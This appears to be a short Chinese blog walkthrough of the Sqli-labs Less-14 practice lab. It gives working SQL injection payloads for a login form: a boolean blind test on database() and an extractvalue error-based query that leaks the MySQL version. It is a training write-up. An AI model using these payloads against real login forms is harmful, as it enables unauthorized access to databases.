Sqli-labs less 14

Less-14

本关我们直接进行测试，输入username：admin"

Pasword:(随意)

Sqli-labs less 14

可以看到报错了，那么我们知道了id进行了 " 的操作。

这里和less13一样，主要是熟悉利用盲注。

简单列一下payload：

uname=admin"and left(database(),1)>'a'#&passwd=1&submit=Submit

可以登录成功。

在利用一下报错注入

uname=admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&passwd=1&submit=Submit

Sqli-labs less 14

可以看到报错了，显示版本信息。

相关文章：

2021-10-31
2021-04-23
2021-12-16
2021-09-14
2021-10-28
2021-09-24
2021-06-02
2021-09-22

猜你喜欢

2022-01-16
2021-10-23
2021-07-09
2021-04-29
2021-07-17
2021-08-31
2021-10-26

相关资源

下载 2021-09-09
下载 2021-06-26
下载 2021-06-30

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode